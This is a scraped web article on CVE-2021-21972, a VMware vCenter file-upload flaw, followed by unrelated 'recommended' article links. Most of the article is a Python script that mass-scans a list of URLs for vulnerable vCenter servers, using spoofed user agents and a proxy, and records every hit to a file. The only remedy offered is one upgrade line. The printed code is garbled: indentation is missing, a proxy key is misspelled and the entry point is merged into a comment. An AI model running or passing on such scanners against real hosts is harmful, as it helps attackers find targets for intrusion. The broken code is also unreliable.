About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)
backgroundCVE-2021-21972 An unauthenticated command execution vulnerability in VMware vCenter. This vulnerability can upload a webshell to any location on the vcenter server and then execute the webshell. Affected versions vmware:esxi:7.0/6.7/6.5 Vulnerability reproduction fofa query Syntax:
POC
Use
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import requests
import argparse
import http.client
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
proxies = {"scoks5": "http://127.0.0.1:1081"}
headers = {
'User-Agent': get_ua(),
"Content-Type": "application/x-www-form-urlencoded"
}
targetUrl = url + TARGET_URI
try:
res = requests.get(targetUrl,
headers=headers,
timeout=15,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
# print(len(res.text))
if res.status_code == 405:
print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("vulnerability address.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " No CVE-2021-21972 vulnerability was found.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # default 15 threads if __name__ == "__main__":
main()
EXP Repair Suggestions Upgrade vCenter Server 7.0 to 7.0.U1c This is the end of this article about the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972). For more related VMware vcenter upload vulnerability content, please search 123WORDPRESS.COM's previous articles or continue to browse the following related articles. I hope everyone will support 123WORDPRESS.COM in the future! You may also be interested in:
|
<<: Introduction to query commands for MySQL stored procedures
>>: Vue makes div height draggable
Recommend
Detailed explanation of Vue's front-end system and front-end and back-end separation
Table of contents Overview Front-end knowledge sy...
Implementing a simple whack-a-mole game in JavaScript
This article shares the specific code for JavaScr...
How to make a website look taller and more designed
“How to make a website look high-end? Or more des...
Detailed explanation of common methods of JavaScript String
Table of contents 1. charAt grammar parameter ind...
Sharing of web color contrast and harmony techniques
Color contrast and harmony In contrasting conditi...
Summary of methods for writing judgment statements in MySQL
How to write judgment statements in mysql: Method...
Detailed installation and use of RocketMQ in Docker
To search for RocketMQ images, you can search on ...
avue-crud implementation example of multi-level complex dynamic header
Table of contents Preface Background data splicin...
Linux completely removes node.js and reinstalls it through the yum command
first step Delete it once with the built-in packa...
Summary of seven sorting algorithms implemented in JavaScript (recommended!)
Table of contents Preface Bubble Sort Basic Algor...
Usage of if judgment in HTML
In the process of Django web development, when wr...
JavaScript implements asynchronous submission of form data
This article example shares the specific code of ...
Vant uploader implements the drag-and-drop function for uploading pictures (set as cover)
The effect diagram is as follows: <!DOCTYPE ht...
Gallery function implemented by native Js
Table of contents The first The second Native Js ...
CentOS 8 system FTP server installation and passive mode configuration detailed tutorial
Table of contents 1. Understand the basics 2. Con...